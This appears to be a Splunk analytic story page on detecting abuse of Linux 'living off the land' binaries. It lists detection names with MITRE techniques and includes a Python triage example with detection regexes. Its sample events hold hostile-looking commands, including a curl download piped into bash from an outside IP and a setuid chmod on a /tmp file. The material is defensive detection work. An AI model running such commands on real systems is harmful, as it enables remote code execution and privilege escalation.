Description

Linux Living Off The Land consists of binaries that may be used to bypass local security restrictions within misconfigured systems.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2022-07-27
  • Author: Michael Haag, Splunk
  • ID: e405a2d7-dc8e-4227-8e9d-f60267b8c0cd

Narrative

Similar to the Windows LOLBAS project, the GTFOBins project focuses solely on Unix binaries that can be abused across many categories, including Reverse Shell, File Upload, File Download and more. These binaries ship with the operating system, and the functionality being abused is part of their intended design. The behaviors are typically neither malicious by default nor the result of a vulnerability; they are built-in functionality of the applications. When reviewing any notables or hunting through large volumes of events of interest, it is important to identify the binary, review the command-line arguments and the path of the file, and capture any network and file modifications. Linux analysis may be cumbersome because of event volume and the way process behavior is represented in EDR products; piecing it together will require some effort.

Detections

| Name | Technique | Type |
|---|---|---|
| Curl Download and Bash Execution | Ingress Tool Transfer | TTP |
| Linux AWK Privilege Escalation | Sudo and Sudo Caching, Abuse Elevation Control Mechanism | Anomaly |
| Linux Add Files In Known Crontab Directories | Cron, Scheduled Task/Job | Anomaly |
| Linux Adding Crontab Using List Parameter | Cron, Scheduled Task/Job | Hunting |
| Linux At Allow Config File Creation | Cron, Scheduled Task/Job | Anomaly |
| Linux At Application Execution | At, Scheduled Task/Job | Anomaly |
| Linux Change File Owner To Root | Linux and Mac File and Directory Permissions Modification, File and Directory Permissions Modification | Anomaly |
| Linux Clipboard Data Copy | Clipboard Data | Anomaly |
| Linux Common Process For Elevation Control | Setuid and Setgid, Abuse Elevation Control Mechanism | Hunting |
| Linux Curl Upload File | Ingress Tool Transfer | TTP |
| Linux Decode Base64 to Shell | Obfuscated Files or Information, Unix Shell | TTP |
| Linux Docker Privilege Escalation | Sudo and Sudo Caching, Abuse Elevation Control Mechanism | Anomaly |
| Linux Edit Cron Table Parameter | Cron, Scheduled Task/Job | Hunting |
| Linux Ingress Tool Transfer Hunting | Ingress Tool Transfer | Hunting |
| Linux Ingress Tool Transfer with Curl | Ingress Tool Transfer | Anomaly |
| Linux Node Privilege Escalation | Sudo and Sudo Caching, Abuse Elevation Control Mechanism | Anomaly |
| Linux Obfuscated Files or Information Base64 Decode | Obfuscated Files or Information | Anomaly |
| Linux Possible Access Or Modification Of sshd Config File | SSH Authorized Keys, Account Manipulation | Anomaly |
| Linux Possible Append Cronjob Entry on Existing Cronjob File | Cron, Scheduled Task/Job | Hunting |
| Linux Possible Cronjob Modification With Editor | Cron, Scheduled Task/Job | Hunting |
| Linux Possible Ssh Key File Creation | SSH Authorized Keys, Account Manipulation | Anomaly |
| Linux Proxy Socks Curl | Proxy, Non-Application Layer Protocol | TTP |
| Linux SSH Authorized Keys Modification | SSH Authorized Keys | Anomaly |
| Linux SSH Remote Services Script Execute | SSH | TTP |
| Linux Service File Created In Systemd Directory | Systemd Timers, Scheduled Task/Job | Anomaly |
| Linux Service Restarted | Systemd Timers, Scheduled Task/Job | Anomaly |
| Linux Service Started Or Enabled | Systemd Timers, Scheduled Task/Job | Anomaly |
| Linux Setuid Using Chmod Utility | Setuid and Setgid, Abuse Elevation Control Mechanism | Anomaly |
| Linux pkexec Privilege Escalation | Exploitation for Privilege Escalation | TTP |
| Suspicious Curl Network Connection | Ingress Tool Transfer | TTP |
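The narrative asks an analyst to identify the binary, its arguments and path for each event of interest; the following added example (not Splunk's own SPL or code) does that triage over constructed process events and tags each one with the names of five detections from the table above. The RULES regexes are hypothetical simplifications written for this illustration, and the event field names (process_name, process_path, process) are assumed to mirror Endpoint datamodel process fields.

```python
import re
import shlex
from pathlib import PurePosixPath

# Hypothetical, simplified versions of five detections from the table above,
# keyed by the page's detection names: (process_name filter, command-line regex).
RULES = {
    "Curl Download and Bash Execution": ({"sh", "bash", "curl"},
        re.compile(r"\bcurl\b.*\|\s*(?:ba)?sh\b")),
    "Linux Decode Base64 to Shell": ({"sh", "bash", "base64"},
        re.compile(r"\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")),
    "Linux Setuid Using Chmod Utility": ({"chmod"},
        re.compile(r"\bchmod\b(?:\s+-\S+)*\s+(?:[ugoa]*\+[rwx]*s[rwx]*|[4-7][0-7]{3})\b")),
    "Linux Adding Crontab Using List Parameter": ({"crontab"},
        re.compile(r"\bcrontab\b.*\s-l\b")),
    "Linux Change File Owner To Root": ({"chown"},
        re.compile(r"\bchown\b(?:\s+-\S+)*\s+root(?::\S*)?\s")),
}

# Constructed sample events shaped like Endpoint datamodel process fields (not real telemetry).
EVENTS = [
    {"process_name": "sh", "process_path": "/usr/bin/sh",
     "process": 'sh -c "curl -s http://203.0.113.7/run.sh | bash"'},
    {"process_name": "chmod", "process_path": "/usr/bin/chmod", "process": "chmod u+s /tmp/helper"},
    {"process_name": "chmod", "process_path": "/usr/bin/chmod", "process": "chmod 755 /opt/app/bin/app"},
    {"process_name": "crontab", "process_path": "/usr/bin/crontab", "process": "crontab -l"},
    {"process_name": "chown", "process_path": "/usr/bin/chown", "process": "chown -R root:root /opt/app"},
]

def triage(event):
    """Extract binary, arguments and path, plus the names of any matching detections."""
    cmdline = event.get("process", "")
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the captured command line
        argv = cmdline.split()
    binary = event.get("process_name") or (PurePosixPath(argv[0]).name if argv else "")
    hits = [name for name, (procs, rx) in RULES.items()
            if binary in procs and rx.search(cmdline)]
    return {"binary": binary, "path": event.get("process_path", ""),
            "args": argv[1:], "detections": hits}

def summarize(events):
    """Group command lines by triggered detection for a first pass over notables."""
    by_rule = {}
    for ev in events:
        for hit in triage(ev)["detections"]:
            by_rule.setdefault(hit, []).append(ev["process"])
    return by_rule
```

The plain `chmod 755` event is included as a negative case: it shares a binary with the setuid detection but carries no setuid bit, so it should not be flagged.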

Version: 1